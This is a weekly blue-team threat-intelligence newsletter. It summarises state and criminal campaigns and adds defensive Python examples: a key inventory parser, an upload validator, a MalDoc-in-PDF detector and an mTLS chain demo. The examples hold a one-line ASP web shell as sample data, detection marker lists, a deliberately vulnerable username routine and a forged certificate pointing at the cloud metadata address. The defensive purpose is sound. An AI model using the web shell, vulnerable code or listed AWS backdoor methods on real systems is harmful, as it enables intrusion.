Bluepurple Pulse: week ending August 27th
Chinese supply chain attack using signed code...
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week the Chinese reporting is of note, including the use of signed code in a supply chain attack against South East Asian targets.
In the high-level this week:
Exposed: the Chinese spy using LinkedIn to hunt UK secrets - believed to have initially focused on defence contractors, civil servants and targets in sensitive business areas. He has since switched to targeting think tanks and academics who are still considered vulnerable and do not always realise the value of the information they possess.
First discovery of 'spy chip' in Chinese weather equipment - The National Intelligence Service recently discovered a backdoor that allows wireless eavesdropping or hacking in the weather observation equipment of public institutions in Korea.
Strong practical help for firms hit by cyberattack - (Australia) Firms and public agencies hit by cyberattacks are being promised a quick, compassionate and discreet response, aimed at minimising harms, says cyber defence leader, Abigail Bradshaw
Feds put cybersecurity for AI, quantum computing in the spotlight - A trio of government agencies on Monday urged organizations to prepare now for quantum computers’ ability to break through encryption, telling them to develop a “road map” for a future that grows near.
Post-Quantum Cryptography: CISA, NIST, and NSA Recommend How to Prepare Now - the NSA guidance
Open source research institute launches in Canberra - “.. in the hopes of establishing Canberra as an open source leader. Total investment in the institute is $2.3 million.”
Safeguarding the US Space Industry - Public awareness campaign from the US Government around intellectual property theft.
China deploys swarm of satellites to monitor military exercises in Australia - the Enemy of the State satellite scene, but in real life..
China hoped Fiji would be a template for the Pacific. Its plan backfired - The specter of Chinese surveillance resurfaced last year when Beijing pushed a sweeping pact with 10 Pacific island nations that would have given China influence over policing, customs, cybersecurity, communications, deep-sea mining and more.
AI-generated art cannot receive copyrights, US court says - it will be interesting to see if this applies to code etc. as well.
Troops need improved cyber education, US Army leaders say - “Warfare is still — and we need only to take a look at Ukraine — a very violent endeavor. Cyber alone will not win a war.” However, “failure to defend the networks that our warfighters use absolutely will cause us to lose.”
High Costs Won’t Deter Germany From Removing Huawei Parts - “We will prohibit components if they pose a serious security risk,”
Cybercrime: 14 arrests, thousands of illicit cyber networks disrupted in Africa operation - operation across 25 African countries that enabled investigators to arrest 14 suspected cybercriminals and identify 20,674 suspicious cyber networks, highlighting the surge in digital insecurity and cyber threats in the region.
Cyber security is global problem, declares G20 Digital Economy Ministers' meet - Union Minister Ashwini Vaishnaw on Saturday said there was a consensus during the G20 Digital Economy Ministers' Meeting that cyber security is an international problem that requires collaboration and steps for building trust and respect for other economies.
Ecuador hit by earthquake and cyberattacks amid presidential election - However Atamaint, president of the National Electoral Council, said the electronic voting system used by Ecuadorians living abroad was targeted by several cyberattacks, including from China, India and Bangladesh. She said the incidents did not jeopardize vote counts.
Brazilian hacker says Bolsonaro asked him to tamper with voting machine - A Brazilian hacker told a congressional inquiry on Thursday that former President Jair Bolsonaro asked him to tamper with an electronic voting machine to show Brazil's electoral system was vulnerable to fraud during last year's presidential campaign.
Tornado Cash Founders Charged With Money Laundering And Sanctions Violations - Roman Storm and Roman Semenov Charged with Operating the Tornado Cash Service, Laundering More Than $1 Billion in Criminal Proceeds
Army cyber officials want to harness AI, but not over-hype - “We're in the early stages of it," Maj. Gen. Paul Stanton said about an AI pilot program. "But my point is we're not sitting on the sidelines and watching, we're diving in.”
The reflection this week comes from the US firing the starting gun on preparation for a post-quantum cryptography world by building inventories.
It is no overstatement to say that this is going to be a complex task to do well: identifying vulnerable uses of algorithms and the associated trust infrastructure (e.g. certificate authorities we didn’t know existed), let alone performing discovery across third-party dependencies and technology black boxes.
The reflection? Having lived through Y2K, this feels like the mini-scale cyber version of it, which in reality is likely to be just as complex once you move away from systems which automatically update..
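As an added illustration of the inventory problem (this is my example, not anything from the US guidance or a vendor tool), the snippet below classifies the public-key algorithm carried in a DER-encoded SubjectPublicKeyInfo, which is the step you end up needing for every certificate, SSH key and code-signing key the discovery phase turns up. The OID table is the handful of algorithms you meet in today’s certificates; the three sample keys are constructed with synthetic key material (the RSA modulus and the EC point are not real keys) purely so the parser has something to chew on offline.

```python
"""Classify DER SubjectPublicKeyInfo blobs for a post-quantum crypto inventory (added example)."""
from typing import Dict, Optional, Tuple

# Algorithm OIDs commonly seen in today's certificates. Every entry is a classical public-key
# scheme that Shor's algorithm breaks, so each one is flagged quantum-vulnerable.
OID_NAMES = {
    "1.2.840.113549.1.1.1": "rsaEncryption",
    "1.2.840.10045.2.1": "ecPublicKey",
    "1.3.101.112": "Ed25519",
    "1.3.101.113": "Ed448",
    "1.2.840.10040.4.1": "dsa",
}
CURVE_NAMES = {
    "1.2.840.10045.3.1.7": "P-256",
    "1.3.132.0.34": "P-384",
    "1.3.132.0.35": "P-521",
}


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one DER tag-length-value at pos; returns (tag, value, position after the element)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low bits give the byte count of the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(value: bytes) -> str:
    """Decode DER OBJECT IDENTIFIER contents into dotted form."""
    arcs = [value[0] // 40, value[0] % 40]
    acc = 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:                   # high bit clear ends the base-128 arc
            arcs.append(acc)
            acc = 0
    return ".".join(str(a) for a in arcs)


def classify_spki(spki: bytes) -> Dict[str, Optional[object]]:
    """Return algorithm name, key size / curve and a quantum-vulnerable verdict for one SPKI."""
    tag, body, _ = read_tlv(spki, 0)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    tag, alg, pos = read_tlv(body, 0)            # AlgorithmIdentifier
    _, key_bitstring, _ = read_tlv(body, pos)    # BIT STRING holding the public key
    key = key_bitstring[1:]                      # first byte is the unused-bits count
    _, oid, after_oid = read_tlv(alg, 0)
    dotted = decode_oid(oid)
    name = OID_NAMES.get(dotted, dotted)
    info: Dict[str, Optional[object]] = {
        "algorithm": name,
        "key_bits": None,
        "curve": None,
        "quantum_vulnerable": True if dotted in OID_NAMES else None,   # None = unknown OID, triage by hand
    }
    if name == "rsaEncryption":                  # RSAPublicKey ::= SEQUENCE { modulus, publicExponent }
        _, rsa_key, _ = read_tlv(key, 0)
        _, modulus, _ = read_tlv(rsa_key, 0)
        info["key_bits"] = int.from_bytes(modulus, "big").bit_length()
    elif name == "ecPublicKey":                  # the curve OID is the AlgorithmIdentifier parameter
        _, curve_oid, _ = read_tlv(alg, after_oid)
        info["curve"] = CURVE_NAMES.get(decode_oid(curve_oid), decode_oid(curve_oid))
    elif name in ("Ed25519", "Ed448"):
        info["key_bits"] = len(key) * 8
    return info


def der(tag: int, value: bytes) -> bytes:
    """Minimal DER encoder, used only to build the constructed samples below."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + value


# Constructed samples (synthetic key material, not real keys).
_RSA_OID = bytes.fromhex("2a864886f70d010101")
_EC_OID = bytes.fromhex("2a8648ce3d0201")
_P256_OID = bytes.fromhex("2a8648ce3d030107")
_ED25519_OID = bytes.fromhex("2b6570")

_modulus = (1 << 2047) | 1                       # 2048-bit odd integer, not a product of two primes
_rsa_pub = der(0x30, der(0x02, b"\x00" + _modulus.to_bytes(256, "big")) + der(0x02, b"\x01\x00\x01"))
RSA_2048_SPKI = der(0x30, der(0x30, der(0x06, _RSA_OID) + der(0x05, b"")) + der(0x03, b"\x00" + _rsa_pub))
P256_SPKI = der(0x30, der(0x30, der(0x06, _EC_OID) + der(0x06, _P256_OID)) + der(0x03, b"\x00\x04" + b"\x11" * 64))
ED25519_SPKI = der(0x30, der(0x30, der(0x06, _ED25519_OID)) + der(0x03, b"\x00" + b"\x22" * 32))

if __name__ == "__main__":
    for label, blob in (("rsa", RSA_2048_SPKI), ("p256", P256_SPKI), ("ed25519", ED25519_SPKI)):
        print(label, classify_spki(blob))
```

Feed it the raw SPKI bytes your certificate library hands back for each leaf and CA certificate you find; the classification step is the easy part, which is rather the point of the reflection.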
Have a lovely Thursday
Cyber threat intelligence
Who is doing what to whom and how.
Summit Old, Summit New
Léa Ronzaud, Joseph A. Carter, and Tyler Williams provide insight into a contemporary Russian information operation. We can expect more of these as their own situation deteriorates, I suspect..
Russia-linked actors engaged in a multi-pronged effort to influence online conversations around the July 2023 NATO Vilnius summit, using deceptive practices to advance narratives almost certainly intended to denigrate NATO and host nation Lithuania. These included disseminating documents purportedly hacked from the Lithuanian government, and seeding false claims about NATO’s spending and involvement in French domestic affairs.
The actors conducted two distinct influence operations, employing a range of inauthentic behaviors almost certainly intended to deceive online audiences. These tactics, techniques, and procedures (TTPs) included creating and disseminating bogus NATO press releases and operating fake personas across multiple online platforms.
North Korean hackers target U.S.-South Korea military drills, police say
Ju-min Park provides English reporting on a South Korean police release. Phishing was the method - I have included the South Korean police reporting, which uses an image for the press release so it is not easy to automatically translate.
The hackers were believed to be linked to a North Korean group that researchers call Kimsuky, and they carried out their hack via emails to South Korean contractors working at the South Korea-U.S. combined exercise war simulation centre, the Gyeonggi Nambu Provincial Police Agency said in a statement.
$200M in Crypto Stolen in 2023; Over $2B in the Last Five Years
We have covered the scale of their crypto thefts before, but it is worth reminding ourselves it continues..
Over the past five years, North Korean hackers have stolen over USD 2 billion in cryptocurrencies in over 30 attacks, according to TRM Labs. While reports have indicated the amount of crypto stolen by North Korea since 2018 to be as high as $3 billion, our research indicates that this figure likely includes multiple large hacks misattributed to North Korea.
In 2023, although the total amount stolen in cryptocurrency attacks is down from a record-setting 2022, North Korea has maintained its focus on the crypto ecosystem. Year-to-date, North Korea has stolen USD 200 million in cryptocurrency, accounting for over 20% of all stolen crypto this year.
FBI Identifies Cryptocurrency Funds Stolen by DPRK
As a further reminder, the FBI has released this insight from a couple of days ago as North Korea looks to cash out. Everyone will be watching to see where the trail stops…
The FBI is warning cryptocurrency companies of recent blockchain activity connected to the theft of hundreds of millions of dollars in cryptocurrency. Over the last 24 hours, the FBI tracked cryptocurrency stolen by the Democratic People's Republic of Korea (DPRK) TraderTraitor-affiliated actors (also known as Lazarus Group and APT38). The FBI believes the DPRK may attempt to cash out the bitcoin worth more than $40 million dollars.
Analyzing the new attack activity of the Andariel group
South Korean reporting on recent North Korean state-aligned activity. The takeaway here is they aren’t only using phishing but also exploiting vulnerabilities (which we have covered previously).
the case of attacking a domestic university by exploiting Innorix Agent and the case of installing malicious code in domestic companies through an attack presumed to be spear phishing, were dealt with. Here, we summarize the grounds for assuming that the two types of attacks were performed by the same attacker
GroundPeony: Crawling with Malice
Rintaro Koike and Shota Nakajima detail a suspected Chinese state campaign which used run-of-the-mill tradecraft coupled with a degree of pre-positioning.
In March 2023, we discovered a cyber attack campaign targeting Taiwanese government agencies. The campaign employed devious tactics such as tampering with legitimate websites to distribute malware, using URL obfuscation, and employing multi-stage loaders.
Carderbee: APT Group use Legit Software in Supply Chain Attack Targeting Orgs in Hong Kong
At the more sophisticated end of the supply chain business there is this. The response and change of process within MSFT, if any, will be interesting to see here.
A previously unknown advanced persistent threat (APT) group used the legitimate Cobra DocGuard software to carry out a supply chain attack with the goal of deploying the Korplug backdoor (aka PlugX) onto victim computers.
In the course of this attack, the attackers used malware signed with a legitimate Microsoft certificate. Most of the victims in this campaign are based in Hong Kong, with some victims based in other regions of Asia.
Cobra DocGuard Client is software produced by a China-based company called EsafeNet and appears to legitimately be used to protect, encrypt, and decrypt software. EsafeNet is owned by Chinese information security firm NSFOCUS.
Analysis of APT attack cases targeting web services of domestic companies
South Korean reporting on a few bits including a suspected Chinese state actor as well as North Korean one. The Chinese tradecraft will be familiar to many..
According to KISA's report, the attacker used a file upload vulnerability on the homepage of the victim company to upload the web shell as an attachment. The attacker is said to have additionally uploaded a secondary web shell (1.asp) to the general path, not the upload path, using the primary web shell uploaded for the first time. "1.aspx" exists.
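The chain described here (upload a web shell as an "attachment", then use it to drop a second shell outside the upload path) is the classic file-upload failure. As an added example, which is mine and not from the KISA report, here is the validation an upload handler needs in order to stop it, plus a sweep that finds server-side script files sitting in an upload directory after the fact. The extension lists, upload directory names and sample files are constructed for the demo.

```python
"""Added example: hardened upload validation and a sweep for web shells in upload paths."""
import os
import secrets
from typing import Iterable, List, Tuple

# Extensions an IIS/ASP.NET or PHP host would execute, or that alter handler config, if they land
# under the webroot (assumed list; extend for your stack).
SERVER_SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".php", ".phtml", ".jsp", ".jspx", ".cer", ".config"}
# Allow-list of what this endpoint is meant to accept: extension -> acceptable magic-byte prefixes.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".pdf": (b"%PDF-",),
}
# Script markers that have no business inside an image or document (catches polyglot uploads).
SCRIPT_MARKERS = (b"<%", b"<?php", b'runat="server"', b"<script")


def all_extensions(filename: str) -> List[str]:
    """'shell.jpg.aspx' -> ['.jpg', '.aspx']; IIS-style 'shell.asp;.jpg' is split on ';' as well."""
    base = os.path.basename(filename).replace(";", ".")
    parts = base.lower().split(".")
    return ["." + p for p in parts[1:] if p]


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (ok, reason). Every extension is checked, then magic bytes, then the body for script markers."""
    exts = all_extensions(filename)
    if not exts:
        return False, "no extension"
    if any(e in SERVER_SCRIPT_EXTS for e in exts):
        return False, f"server-side script extension in {filename!r}"
    final = exts[-1]
    if final not in ALLOWED_TYPES:
        return False, f"extension {final!r} not allowed"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[final]):
        return False, "content does not match declared type"
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "script markers inside file body"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Never reuse the client-supplied name: random stem, allow-listed extension, no path components."""
    return secrets.token_hex(16) + all_extensions(filename)[-1]


def find_scripts_in_upload_dirs(paths: Iterable[str],
                                upload_dirs: Iterable[str] = ("/uploads/", "/attach/")) -> List[str]:
    """Sweep webroot-relative paths for executable script files living under upload directories."""
    hits = []
    for path in paths:
        norm = path.replace("\\", "/").lower()
        if any(d in norm for d in upload_dirs) and any(e in SERVER_SCRIPT_EXTS for e in all_extensions(norm)):
            hits.append(path)
    return hits


# Constructed sample uploads for the demo.
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
    "report.pdf": b"%PDF-1.4\n%%EOF",
    "1.asp": b'<% eval request("cmd") %>',                          # bare web shell
    "shell.jpg.aspx": b"\xff\xd8\xff" + b'<%@ Page Language="C#" %>',  # double extension
    "image.jpg": b"\xff\xd8\xff" + b"<% Response.Write(1) %>",       # polyglot: JPEG header, ASP body
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, validate_upload(name, body))
    print(find_scripts_in_upload_dirs(["/uploads/2023/1.asp", "/uploads/a.jpg", "/app/default.aspx"]))
```

Storing the file outside the webroot (or on a host with script execution disabled for that directory) is the other half; the validation above only stops the upload from being interpreted as code if it does end up somewhere the web server will serve.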
No public reporting this week
XLoader’s Latest Trick | New macOS Variant Disguised as Signed OfficeNote App
Dinesh Devadoss and Phil Stokes detail a campaign which shows that threat actors are evolving their macOS tradecraft including getting code signed.
XLoader has returned in a new form and without the dependencies. Written natively in the C and Objective C programming languages and signed with an Apple developer signature, XLoader is now masquerading as an office productivity app called ‘OfficeNote’.
The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg. The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C).
The application was signed on 17 July, 2023; however, Apple has since revoked the signature.
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware
Interesting turn of events where a threat actor is trying to find the physical location of devices. Why? We may never know..
[We] observed the Smoke Loader botnet dropping a custom Wi-Fi scanning executable to infected systems. [our] researchers named this malware Whiffy Recon. It triangulates the infected systems' positions using nearby Wi-Fi access points as a data point for Google's geolocation API.
Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware
The Syrian connection is a point of note. Domestic capabilities which start off in the criminal world could in time be repurposed or otherwise transition, as we have seen in the likes of Russia etc.
EVLF has created a web shop for CraxsRAT on the surface web to assert legitimacy to interested threat actors.
Eventually, some of the threat actors who purchased the software from EVLF started releasing cracked versions of the RATs to the black hat community for free (some of them backdoored as well). This exponentially shot up the reachability of these RATs, highly increasing the number of active users.
The threat actor is operating from Syria.
In some of the recent research reports, CraxsRAT is being described as a downloader in an attack on a Windows-based OS. However, as per our investigation and the official website of CraxsRAT, we can confirm that CraxsRAT only targets Android devices. Our research team believes that cracked versions of CraxsRAT builders (that are meant to run on Windows machines) are being distributed in forums with pre-existing backdoors of other malware/ransomware. One of these backdoored samples was analyzed in these reports, due to which CraxsRAT has been categorized as malware that targets Windows.
MalDoc in PDF - Method of embedding malicious Word files into PDF files to avoid detection
Reporting from Japan on a technique which wraps a malicious Microsoft Office document inside a PDF container to avoid detection.
JPCERT/CC has confirmed that a new technique (hereafter referred to as MalDoc in PDF in this article) that embeds a malicious Word file into a PDF file to evade detection was used in the attacks that occurred in July.
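A content-based check is the practical response, since the file carries a PDF header but Word treats it as a document. The detector below is an added example of mine, not JPCERT/CC’s tooling: it flags files that look like a PDF yet contain MHT/Word markers, and reports how much data trails the final %%EOF. The marker strings are assumptions based on how Word writes MHT "web archive" files, and the two sample files are constructed.

```python
"""Added example: flag PDFs that carry an MHT/Word document (the 'MalDoc in PDF' polyglot)."""
from typing import Dict, List

PDF_MAGIC = b"%PDF-"
# Markers of an MHT-style Word document. Assumed from how Word saves MHT files, not a
# signature set taken from the JPCERT/CC write-up.
WORD_MHT_MARKERS = {
    b"MIME-Version:": "MIME header inside a PDF",
    b"Content-Type: multipart/related": "MHT multipart body",
    b"urn:schemas-microsoft-com:office:word": "Word HTML namespace",
    b"<w:WordDocument>": "Word document settings block",
    b"x-mso": "Office MHT content type",
}


def looks_like_pdf(data: bytes) -> bool:
    """PDF readers tolerate junk before the header, so look for %PDF- anywhere in the first 1024 bytes."""
    return data.find(PDF_MAGIC, 0, 1024) != -1


def trailing_bytes_after_eof(data: bytes) -> int:
    """Bytes after the last %%EOF; appended non-PDF content lives here."""
    idx = data.rfind(b"%%EOF")
    return 0 if idx == -1 else len(data) - (idx + len(b"%%EOF"))


def scan_maldoc_in_pdf(data: bytes, tail_threshold: int = 512) -> Dict[str, object]:
    """Return marker hits, the size of any data after the last %%EOF, and a verdict."""
    if not looks_like_pdf(data):
        return {"is_pdf": False, "findings": [], "suspicious": False, "tail_bytes": 0}
    lower = data.lower()
    findings: List[str] = []
    for marker, label in WORD_MHT_MARKERS.items():
        pos = lower.find(marker.lower())
        if pos != -1:
            findings.append(f"{label} at offset {pos}")
    marker_hits = len(findings)
    tail = trailing_bytes_after_eof(data)
    if tail > tail_threshold:
        findings.append(f"{tail} bytes after the final %%EOF")
    # Word/MHT markers inside a PDF are decisive; a long tail on its own is only a hint, because
    # incremental updates legitimately append to PDFs.
    return {"is_pdf": True, "findings": findings, "suspicious": marker_hits > 0, "tail_bytes": tail}


# Constructed samples: a minimal clean PDF, and the same PDF with an MHT Word document appended.
CLEAN_PDF = (b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
             b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
             b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
MHT_PAYLOAD = (b"MIME-Version: 1.0\nContent-Type: multipart/related; boundary=\"----=_NextPart_000\"\n\n"
               b"------=_NextPart_000\nContent-Type: text/html; charset=\"us-ascii\"\n\n"
               b"<html xmlns:w=\"urn:schemas-microsoft-com:office:word\"><head>"
               b"<!--[if gte mso 9]><xml><w:WordDocument><w:View>Normal</w:View></w:WordDocument></xml><![endif]-->"
               b"</head><body>lure text</body></html>\n------=_NextPart_000--\n")
MALDOC_PDF = CLEAN_PDF + MHT_PAYLOAD

if __name__ == "__main__":
    print(scan_maldoc_in_pdf(CLEAN_PDF))
    print(scan_maldoc_in_pdf(MALDOC_PDF))
```

Run it over attachments regardless of their extension: the whole trick is that the extension and header say PDF while the application that opens it decides otherwise.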
ProxyNation: The dark nexus between proxy apps and malware
Ofer Caspi provides insight into criminally built proxy networks.
[We] identified a company that offers proxy services, wherein proxy requests are rerouted through compromised systems that have been transformed into residential exit nodes due to malware infiltration. Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device, [we have] evidence that malware writers are installing the proxy silently in infected systems. In addition, as the proxy application is signed, it has no anti-virus detection, going under the radar of security companies.
JanelaRAT: Repurposed BX Rat Variant Targeting LATAM FinTech
Gaetano Pellegrino and Sudeep Singh provide insight into criminal targeting in Latin America. There is a degree of sophistication here which shows the actor or actors have relative technical capability, albeit one readily available in commercial teams the globe over.
Financial Data in LATAM: As of June 2023, JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions.
New, Nefarious Capabilities: JanelaRAT features a windows titles sensibility mechanism that allows the malware to capture window title data and send it to the threat attackers.
Strategic and Exploitative Behavior: JanelaRAT employs a dynamic socket configuration system. The C2 infrastructure used by the threat attackers heavily abuses dynamic DNS services. Each domain is set up in the infrastructure to be active only on a certain day of the month.
Evasive Maneuvers: JanelaRAT abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection.
Origin of Threat Actor: The developer of JanelaRAT is Portuguese-speaking. There is heavy use of Portuguese in the malware strings, metadata, decrypted strings, etc.
Xurum: New Magento Campaign Discovered
Ron Mankivsky, Dennis German, Chen Doytshman and Maxim Zavodchik provide reporting on one of the more sophisticated skimmer teams. This is one of those problems where banks could kill this overnight with extra verification if they wished (as has largely been done in the UK).
[We] have discovered an ongoing server-side template injection (CVE-2022-24086) campaign that is exploiting digital commerce websites. This campaign targets Magento 2 shops, and we have dubbed it Xurum in reference to the domain name of the attacker’s command and control (C2) server.
We have observed activity in this campaign since at least January 2023. The attacker seems to be interested in payment stats from the orders in the victim's Magento store placed in the past 10 days.
The attacker registers a new Magento component and masks it as “GoogleShoppingAds.”
The attacker uses an advanced web shell named “wso-ng” that is activated only when the attacker sends the cookie “magemojo000” to the backdoor “GoogleShoppingAds” component.
How we find and understand the latent compromises within our environments.
Deep Dive Into Windows Diagnostic Data & Telemetry (EventTranscript.db)
P. Abhiram Kumar provides a useful tip / warning here. These types of bugs are interesting as in a lot of vendors’ eyes they won’t be considered security issues, although they are potentially security impacting in the broadest of senses.
A few weeks ago, I published a Twitter thread where I observed that the SHA1 hash values were wrongly picked up by Windows Diagnostics.
The hash is stored in Amcache.hve style with four zeroes (0000) preceding the hash value.
While experimenting on this I found that sometimes the field can record an incorrect hash of a binary provided a few things. We delve into this now.
How we proactively defend our environments.
From our friends at Google..
DFIQ is a collection of Digital Forensics Investigative Questions and the approaches to answering them. The goal of the project is to build a comprehensive catalog of investigative knowledge to help drive consistent, thorough, and explainable investigations.
How to troubleshoot Live Response in Defender for Endpoint
Jeffrey Appel provides some practical advice for those using Live Response in Defender for Endpoint deployments. Again great to see practitioners giving field reports based on the real world to the community in the open.
In the past years, I deployed Defender for Endpoint in many large environments and discovered sometimes “issues/limitations” related to the Live Response capability. Common examples:
Session slow/ Commands slow
File not collected
No result or status update
History of live response commands
Delay in Live Response connectivity
In this blog, I will explain the troubleshooting capabilities more in-depth with a strong focus on situations where Live Response is not working as expected.
Tracking An Adversary In Real-Time Using Velociraptor
Jos Clephas shows a neat usage of Velociraptor in a real-time setting. What is excellent about their work is the performance considerations piece, where they show how to monitor CPU/RAM utilisation impact so you don’t crater production.
This blog post shows you two practical examples on how to detect adversary activity and alert on it using Velociraptor. It is an extension of part I, which provides two other examples. You can find part I here.
Android Data Encryption in depth
Maxime Rossi Bellom and Damiano Melotti detail their independent research into the quality of the implementation.
Android Disk Encryption is definitely an interesting feature to play with. The first takeaway should probably be on how solidly designed the schema is overall: by combining several pieces coming from different components, it requires an attacker to have very powerful vulnerabilities to defeat it. Trusted chips guarantee an even higher security level, by adding an additional target to be attacked, with a limited attack surface. And still, even after obtaining all the required bits, the credentials need to be bruteforced. While custom hardware can overcome the limitations imposed by scrypt, a very long passphrase remains very hard to guess.
Our attack surface.
CVE-2023-38035: Vulnerability affecting Ivanti Sentry
When there is blood in the water, the vulnerability researcher sharks circle your products is the lesson here.
A vulnerability has been discovered in Ivanti Sentry, formerly MobileIron Sentry. We have reported this as CVE-2023-38035. This vulnerability impacts all supported versions – Versions 9.18, 9.17 and 9.16. Older versions/releases are also at risk.
If exploited, this vulnerability enables an unauthenticated actor to access some sensitive APIs that are used to configure Ivanti Sentry on the administrator portal (commonly, MICS). While the issue has a high CVSS score, there is low risk of exploitation for customers who do not expose 8443 to the internet.
SAP Security: Vulnerability Analysis
Arpine Maghakyan and team provide some data on SAP systems exposed to the Internet and the level of vulnerability. I shared this with a colleague who rightly suggested if they had included the EPSS value it would have been really useful.
[We] undertook an extensive study focusing on the security of SAP systems. Our research involved a comprehensive scan of 10,000 public IP addresses associated with SAP systems. The findings from this study are both enlightening and concerning:
Total Vulnerabilities Detected: 12,875
From the systems analyzed, vulnerabilities were identified in a staggering 3,094 of them. When categorized by the severity of the vulnerabilities, the distribution was as follows:
mTLS: When certificate authentication is done wrong
Michael Stepankin provides a valuable lesson to anyone using mTLS in production who might assume they know how it works and what the inherent vulnerabilities are..
In this post, I’ll deep dive into some interesting attacks on mTLS authentication. We won’t bother you with heavy crypto stuff, but instead we’ll have a look at implementation vulnerabilities and how developers can make their mTLS systems vulnerable to user impersonation, privilege escalation, and information leakages.
We will present some CVEs we found in popular open-source identity servers and ways to exploit them. Finally, we’ll explain how these vulnerabilities can be spotted in source code and how to fix them.
If you’re developing an mTLS system or performing a security assessment, I suggest:
Pay attention when extracting usernames from the mTLS chain, as the servers only verify the first certificate in the chain.
Use Certificate Stores with caution, as it can lead to LDAP and SQL injections.
Certificate revocation can lead to SSRF or even to RCE in the worst case. So, do the revocation check only after all other checks and do not rely on URLs taken from the certificate extensions.
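The first and third points are worth seeing as code. The block below is an added example of mine, not from Michael Stepankin’s post or any of the identity servers it covers. It uses a toy PKI (a certificate is a dict and the "signature" is an HMAC under the CA’s secret) purely so the chain handling runs offline; the CA name, user DNs, CRL allow-list and the forged certificate are all constructed. The vulnerable routine mirrors the mistake described: the TLS layer verifies only the first certificate, then application code walks the whole presented chain and takes its username from the last one.

```python
"""Added example: the chain-handling mistakes above, as vulnerable and fixed code (toy PKI)."""
import hashlib
import hmac
from typing import Dict, List, Optional
from urllib.parse import urlparse

Cert = Dict[str, str]

# Toy PKI so the logic runs offline: a "certificate" is a dict with subject, issuer, an optional CRL
# distribution point URL and a tag standing in for the CA signature (HMAC under the CA's secret).
# This is not X.509 and must not be reused as crypto; only the chain handling is the point.
CA_SECRETS = {"CN=Corp Root CA": b"constructed-ca-secret"}
TRUSTED_CRL_HOSTS = {"crl.corp.example"}          # assumed allow-list for revocation lookups


def _to_be_signed(subject: str, issuer: str) -> bytes:
    return f"{subject}|{issuer}".encode()


def issue(subject: str, issuer: str, crl_url: str = "") -> Cert:
    tag = hmac.new(CA_SECRETS[issuer], _to_be_signed(subject, issuer), hashlib.sha256).hexdigest()
    return {"subject": subject, "issuer": issuer, "crl_url": crl_url, "sig": tag}


def verify_leaf(cert: Cert) -> bool:
    """What the TLS layer does: check the first certificate against a trusted issuer."""
    secret = CA_SECRETS.get(cert["issuer"])
    if secret is None:
        return False
    expected = hmac.new(secret, _to_be_signed(cert["subject"], cert["issuer"]), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, cert["sig"])


def cn_of(dn: str) -> str:
    for part in dn.split(","):
        key, _, value = part.strip().partition("=")
        if key.upper() == "CN":
            return value
    raise ValueError(f"no CN in {dn!r}")


def username_vulnerable(chain: List[Cert]) -> str:
    """Bug: chain[0] was verified, but the loop ends on the CN of the last certificate the client sent,
    which nobody verified."""
    if not verify_leaf(chain[0]):
        raise PermissionError("client certificate rejected")
    username = ""
    for cert in chain:
        username = cn_of(cert["subject"])
    return username


def username_fixed(chain: List[Cert]) -> str:
    """Fix: the identity comes only from the verified leaf."""
    if not verify_leaf(chain[0]):
        raise PermissionError("client certificate rejected")
    return cn_of(chain[0]["subject"])


def revocation_url(cert: Cert) -> Optional[str]:
    """Fix for the SSRF point: the URL in the certificate is client-supplied data. Only allow-listed
    hosts are ever fetched, and callers do this after verification and identity mapping, not before."""
    url = cert.get("crl_url", "")
    host = urlparse(url).hostname
    return url if host in TRUSTED_CRL_HOSTS else None


# Constructed chains: a legitimate user, plus a forged certificate the attacker appends to the chain.
ALICE = issue("CN=alice,O=Corp", "CN=Corp Root CA", "http://crl.corp.example/root.crl")
FORGED: Cert = {"subject": "CN=admin,O=Corp", "issuer": "CN=Corp Root CA",
                "crl_url": "http://169.254.169.254/latest/meta-data/", "sig": "not-a-valid-tag"}
ATTACK_CHAIN = [ALICE, FORGED]

if __name__ == "__main__":
    print("vulnerable:", username_vulnerable(ATTACK_CHAIN))   # attacker becomes admin
    print("fixed:     ", username_fixed(ATTACK_CHAIN))        # stays alice
    print("crl fetch: ", revocation_url(FORGED))              # None, the metadata URL is never fetched
```

The same shape applies to the certificate-store point: any value lifted from a certificate (CN, SAN, serial, issuer) is attacker-influenced input and needs parameterised queries or escaping before it touches LDAP or SQL.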
Attack capability, techniques and trade-craft.
Methods to Backdoor an AWS Account
Fawaz Masood Qureshi provides a further lesson on the complexity of cloud and the novel security challenges which stem from it. The various backdoor techniques covered include:
Temporary Security Credentials
Changing Security Group
EC2 UserData Script
EC2 SSM Send-Command
I suspect many won’t be looked for in incident response.
